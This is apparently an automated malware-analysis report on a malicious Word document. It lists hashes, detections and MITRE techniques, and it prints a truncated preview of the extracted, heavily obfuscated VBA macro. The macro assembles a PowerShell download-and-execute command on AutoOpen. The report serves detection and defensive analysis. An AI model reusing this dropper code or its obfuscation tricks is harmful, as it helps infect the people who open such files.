Office (OLE) malware analysis — malicious · 82d2f44accbf6525

MALICIOUS

Office (OLE)

134.0 KB Created: 2017-12-05 10:47:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: 52d760dcc60fc7d3daacff551b5a228c SHA-1: 4159f25c40da616d24588d13c16b18808eec425a SHA-256: 82d2f44accbf6525b645c68e841f4580b303dc0886e00f129c10487002306bc4

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function and concatenates strings to construct a URL, likely for downloading and executing a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6391051-0' further supports its dropper functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6391051-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6391051-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://C5R+C5RseoeC5R+C In document text (OLE body)
- http://www.real-clIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45748 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45748 bytes
SHA-256: `12be15a7dff32a8ce9891e265ea8baf7a400c5775339aac2051e777324a60d35`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "HjbIFjRf" Function aVmXvtjPjUMXN() omdhsj = Array("iEpKpZj" + "VNZMaBljIjmudN" + "dTOMfRZ" + "HTGjYtpPTb" + "EBBwqZhKKcpP") kjIkvzBFH = Mid("DFC5aUfzRpOujGMvS05R5ht+5'+'ht+C5Rna3envC5R+C5R:publC5R+C5RicC5R+C5R +C55ht'+'+5htR+C5YnNwnrNXts", 19, 68) XhCqQZtjsZ = Array("QKTUtpVM" + "GOvJqhMOOIni" + "JoQEffn" + "IsijdGLcizEsKj" + "OaLRbSqSLcK") OwOrjtE = Array("RCLqbMDjvq" + "tUVMnSTSS" + "IzcVXmzHPuRDkP" + "hwnGXBJLiF" + "EUWrIXwaID") JNASKt = Array("KGjZzXHr" + "jdTWZMAPjwUBJj" + "iwDKXio" + "mVEajMzGIffiY" + "mpbFlIfT") HXVFdbq = Mid("zjTwTbGwRzssakCiHHuiG2p1H+'5R+C5RxexTZ;fC5R+C5RoreC5R+C5RaC00zVuv1s", 26, 34) BKtaTClaV = Array("VDaGZfwBpjGq" + "UjMvuzo" + "PBickYluGJGSwc" + "jRbdPhPmwiPW" + "KBfIOoFBsdo") lNXnimDkmPs = Array("AXivAUz" + "OspjAUmUDk" + "MVdEjRMNiRwfI" + "PDCBQwmLL" + "mifmVpkiY") RUlvaRmzfV = Array("hGZLAAsONVVDF" + "DEjzOAbZ" + "CLsvUXn" + "PSToEGVjEtvSb" + "wUrNwVFDvLHCX") fBMPfjdW = Mid("htOMTjcIBRcGVOKe-exPREssiOn') -cREPlAcE ([cHaR]53+[cHaR]104+[cHaR]116),[cHaR]39 -cREPlAcE ([cHaR]105+[cHaR]82+[cHaR]rFawnJOIIfYBLPmiOJZ", 13, 105) NvndwzkhwB = Array("HkXSzioGOCRMj" + "kQjSmlFAK" + "SzlZsthN" + "VKfjkEmJ" + "wIAaCRBEFSv") VONOvpmkiAC = Array("IEYqahFlmVzwOQ" + "GjHcOPXD" + "aShLWIhB" + "VazVEsuhKhVO" + "GptofzaIjkBRQH") obRXJYk = Array("GzMhofmsImAcu" + "rkjazizGvffAon" + "PCassHBV" + "OEFkWISvsw" + "qzaIotzEh") rGEzuL = Mid("UN8tF'/x'+'TZ.SplitC5R+C5R(xC5R+C5'+'RTZ,xTZ);nC5R+C5Ra3karapas = na3n5ht+5htsaC5R+C5Rdasd.5ht+5htnext(1,5ht+5ht 34C5ht+5ht5R+C5R3245'+');na3huaC5R+C5Rs C5R+C5R='+' 5ht+5htCwrfcPMwj3LVJwsqBCNLsZGfmlsj24Z2f", 6, 168) hAjtrHnt = Array("tOiowPspLlcPhj" + "phscLrS" + "chbZmpwDokun" + "DhPiOAhCCjscfu" + "YnwHbjBGX") jWWwqi = Array("nrzfsja" + "CqpPLLtcNkmM" + "HpXWPbREzIzo" + "aNGEdZsLq" + "aboPPLfP") lujibIirSTw = Array("OBuFnkpNHuq" + "sNFuksdHPv" + "iTDvjZTDfsw" + "zXisDkTsAoOv" + "DKQDlMPS") OqBMBDXh = Mid("EqpLRiNG][CHar]39)) 5ht) -cRepLAcE'+' 5htC5R5ht,[ChAr]39-rEPLacE '+'5httaj5ht,[ChAr]3'+'6) iR5'+'iN8uIL1o71j10", 5, 97) EwmXfzU = Array("UTjBcJcHI" + "DisbtkjWIGM" + "XQhwvbMCsT" + "fTwuLduBSkfna" + "zviioXIFAvPT") kXwfiqWKLj = Array("MlkoFnoqKc" + "hFWFAaWvDfuFHm" + "ODAufiNiLtI" + "ffEJdlBcw" + "KCKpTPqRjcCZY") DosrBPKcuJ = Array("IfBCdQAKwumk" + "LjTszITNIbajj" + "nkNwwzMulSziG" + "hBzGwOloTYzDf" + "ADbVuXNajv") BuAMzSaaWd = Mid("BA8lNDW . ( $enV:comspEC[4,24,25]-jOIn'')( ((' ((5ht iEx ( (C5Rna3francC5R+C5R = newC5R+C5R'+'-obj5ht+5htect SystC5R+C5Rem.C5R+C5ht+5ht5RNzTbIb", 8, 131) vLTOY = Array("qQwLTbKMsLrQ" + "VQTGJhaszjqOzo" + "MfMFHTTNppJXdw" + "zwDQUBMW" + "swrsjGwVmQzMz") LDBWm = Array("kfQvAtQCbfGiU" + "UGwQowuUnuir" + "oifHSBSMiVt" + "fjADstZHl" + "QOJvwtQrVMI") isislvvL = Array("DYXODjaQXc" + "ulYosIOJbvM" + "iZlHmlXawuf" + "lrrcbtoYcmu" + "lXtYkqVYqttpRY") iYwUcwQkVo = Mid("Dw547Y7tMmGhZLKku7QC4juq", 20, 1) IQujG = Array("cUwYocBXl" + "EwIPuQvBJkrN" + "QzXFZwrzj" + "PGfHUFwF" + "ofJLmhzzw") wVMRwKV = Array("fzCizGuCARmih" + "oCsfsVPr" + "pGZGmswCKCFJYa" + "unqUsHwH" + "RCrBKZCYnANXa") FDMoaR = Array("YpLZJGXrjv" + "qPBRSzkJzUX" + "UvlfSPcDhQ" + "KdaIBjUfvQszA" + "HCZsfIBBQ") rYSzzJjs = Mid("OG8Q6R xTZC5R+C5R1r'+'C55ht+5htR+C5RvxTZ + C5R+C5RnC5R+C5R'+'a5ht+5ht3karapaC5R+C5Rs + xTZC5R+C5R.eC'VU14lRIiJWvYrsw7", 6, 96) hotqfNq = Array("IKCPbjc" + "PcklEfvzsrwloj" + "wrkzhVY" + "jTmhKpsW" + "LUnPRZUXdoI") XjwXjnW = Array("dXbFbErtaYqor" + "jZfpcJbwlPKMC" + "CHpINjfd" + "PDqZwXbZ" + "LkIFdLZHQ") dsOLRKWmF = Array("DNjdunFwUp" + "OVvwwqVV" + "zzwrzJREv" + "fvPZQaFPMRmt" + "NQnSRbrhSi") jrXfz = Mid("XzGww5b53),[cHaR]124) )ZSNwljzSsiizO8", 8, 16) tVlski = Array("mMvOBfrSjhb" + "JGRPmljc" + "JprBSCzidjG" + "zrvUootHF" + "ssDaCnNZoXnEc") FRIuJY = Array("ZEOrilWB" + "mJOzwfX" + "aIDiDckbLrzdD" + "NNEzLLN" + "bvlqkECoVmDA") OJDcUZcQOwB ... (truncated)

SHA-256: 12be15a7dff32a8ce9891e265ea8baf7a400c5775339aac2051e777324a60d35

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HjbIFjRf"
Function aVmXvtjPjUMXN()
omdhsj = Array("iEpKpZj" + "VNZMaBljIjmudN" + "dTOMfRZ" + "HTGjYtpPTb" + "EBBwqZhKKcpP")
kjIkvzBFH = Mid("DFC5aUfzRpOujGMvS05R5ht+5'+'ht+C5Rna3envC5R+C5R:publC5R+C5RicC5R+C5R +C55ht'+'+5htR+C5YnNwnrNXts", 19, 68)
XhCqQZtjsZ = Array("QKTUtpVM" + "GOvJqhMOOIni" + "JoQEffn" + "IsijdGLcizEsKj" + "OaLRbSqSLcK")
OwOrjtE = Array("RCLqbMDjvq" + "tUVMnSTSS" + "IzcVXmzHPuRDkP" + "hwnGXBJLiF" + "EUWrIXwaID")
JNASKt = Array("KGjZzXHr" + "jdTWZMAPjwUBJj" + "iwDKXio" + "mVEajMzGIffiY" + "mpbFlIfT")
HXVFdbq = Mid("zjTwTbGwRzssakCiHHuiG2p1H+'5R+C5RxexTZ;fC5R+C5RoreC5R+C5RaC00zVuv1s", 26, 34)
BKtaTClaV = Array("VDaGZfwBpjGq" + "UjMvuzo" + "PBickYluGJGSwc" + "jRbdPhPmwiPW" + "KBfIOoFBsdo")
lNXnimDkmPs = Array("AXivAUz" + "OspjAUmUDk" + "MVdEjRMNiRwfI" + "PDCBQwmLL" + "mifmVpkiY")
RUlvaRmzfV = Array("hGZLAAsONVVDF" + "DEjzOAbZ" + "CLsvUXn" + "PSToEGVjEtvSb" + "wUrNwVFDvLHCX")
fBMPfjdW = Mid("htOMTjcIBRcGVOKe-exPREssiOn') -cREPlAcE ([cHaR]53+[cHaR]104+[cHaR]116),[cHaR]39  -cREPlAcE ([cHaR]105+[cHaR]82+[cHaR]rFawnJOIIfYBLPmiOJZ", 13, 105)
NvndwzkhwB = Array("HkXSzioGOCRMj" + "kQjSmlFAK" + "SzlZsthN" + "VKfjkEmJ" + "wIAaCRBEFSv")
VONOvpmkiAC = Array("IEYqahFlmVzwOQ" + "GjHcOPXD" + "aShLWIhB" + "VazVEsuhKhVO" + "GptofzaIjkBRQH")
obRXJYk = Array("GzMhofmsImAcu" + "rkjazizGvffAon" + "PCassHBV" + "OEFkWISvsw" + "qzaIotzEh")
rGEzuL = Mid("UN8tF'/x'+'TZ.SplitC5R+C5R(xC5R+C5'+'RTZ,xTZ);nC5R+C5Ra3karapas = na3n5ht+5htsaC5R+C5Rdasd.5ht+5htnext(1,5ht+5ht 34C5ht+5ht5R+C5R3245'+');na3huaC5R+C5Rs C5R+C5R='+' 5ht+5htCwrfcPMwj3LVJwsqBCNLsZGfmlsj24Z2f", 6, 168)
hAjtrHnt = Array("tOiowPspLlcPhj" + "phscLrS" + "chbZmpwDokun" + "DhPiOAhCCjscfu" + "YnwHbjBGX")
jWWwqi = Array("nrzfsja" + "CqpPLLtcNkmM" + "HpXWPbREzIzo" + "aNGEdZsLq" + "aboPPLfP")
lujibIirSTw = Array("OBuFnkpNHuq" + "sNFuksdHPv" + "iTDvjZTDfsw" + "zXisDkTsAoOv" + "DKQDlMPS")
OqBMBDXh = Mid("EqpLRiNG][CHar]39)) 5ht) -cRepLAcE'+'  5htC5R5ht,[ChAr]39-rEPLacE  '+'5httaj5ht,[ChAr]3'+'6) iR5'+'iN8uIL1o71j10", 5, 97)
EwmXfzU = Array("UTjBcJcHI" + "DisbtkjWIGM" + "XQhwvbMCsT" + "fTwuLduBSkfna" + "zviioXIFAvPT")
kXwfiqWKLj = Array("MlkoFnoqKc" + "hFWFAaWvDfuFHm" + "ODAufiNiLtI" + "ffEJdlBcw" + "KCKpTPqRjcCZY")
DosrBPKcuJ = Array("IfBCdQAKwumk" + "LjTszITNIbajj" + "nkNwwzMulSziG" + "hBzGwOloTYzDf" + "ADbVuXNajv")
BuAMzSaaWd = Mid("BA8lNDW . ( $enV:comspEC[4,24,25]-jOIn'')( ((' ((5ht iEx ( (C5Rna3francC5R+C5R = newC5R+C5R'+'-obj5ht+5htect SystC5R+C5Rem.C5R+C5ht+5ht5RNzTbIb", 8, 131)
vLTOY = Array("qQwLTbKMsLrQ" + "VQTGJhaszjqOzo" + "MfMFHTTNppJXdw" + "zwDQUBMW" + "swrsjGwVmQzMz")
LDBWm = Array("kfQvAtQCbfGiU" + "UGwQowuUnuir" + "oifHSBSMiVt" + "fjADstZHl" + "QOJvwtQrVMI")
isislvvL = Array("DYXODjaQXc" + "ulYosIOJbvM" + "iZlHmlXawuf" + "lrrcbtoYcmu" + "lXtYkqVYqttpRY")
iYwUcwQkVo = Mid("Dw547Y7tMmGhZLKku7QC4juq", 20, 1)
IQujG = Array("cUwYocBXl" + "EwIPuQvBJkrN" + "QzXFZwrzj" + "PGfHUFwF" + "ofJLmhzzw")
wVMRwKV = Array("fzCizGuCARmih" + "oCsfsVPr" + "pGZGmswCKCFJYa" + "unqUsHwH" + "RCrBKZCYnANXa")
FDMoaR = Array("YpLZJGXrjv" + "qPBRSzkJzUX" + "UvlfSPcDhQ" + "KdaIBjUfvQszA" + "HCZsfIBBQ")
rYSzzJjs = Mid("OG8Q6R xTZC5R+C5R1r'+'C55ht+5htR+C5RvxTZ + C5R+C5RnC5R+C5R'+'a5ht+5ht3karapaC5R+C5Rs + xTZC5R+C5R.eC'VU14lRIiJWvYrsw7", 6, 96)
hotqfNq = Array("IKCPbjc" + "PcklEfvzsrwloj" + "wrkzhVY" + "jTmhKpsW" + "LUnPRZUXdoI")
XjwXjnW = Array("dXbFbErtaYqor" + "jZfpcJbwlPKMC" + "CHpINjfd" + "PDqZwXbZ" + "LkIFdLZHQ")
dsOLRKWmF = Array("DNjdunFwUp" + "OVvwwqVV" + "zzwrzJREv" + "fvPZQaFPMRmt" + "NQnSRbrhSi")
jrXfz = Mid("XzGww5b53),[cHaR]124) )ZSNwljzSsiizO8", 8, 16)
tVlski = Array("mMvOBfrSjhb" + "JGRPmljc" + "JprBSCzidjG" + "zrvUootHF" + "ssDaCnNZoXnEc")
FRIuJY = Array("ZEOrilWB" + "mJOzwfX" + "aIDiDckbLrzdD" + "NNEzLLN" + "bvlqkECoVmDA")
OJDcUZcQOwB 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.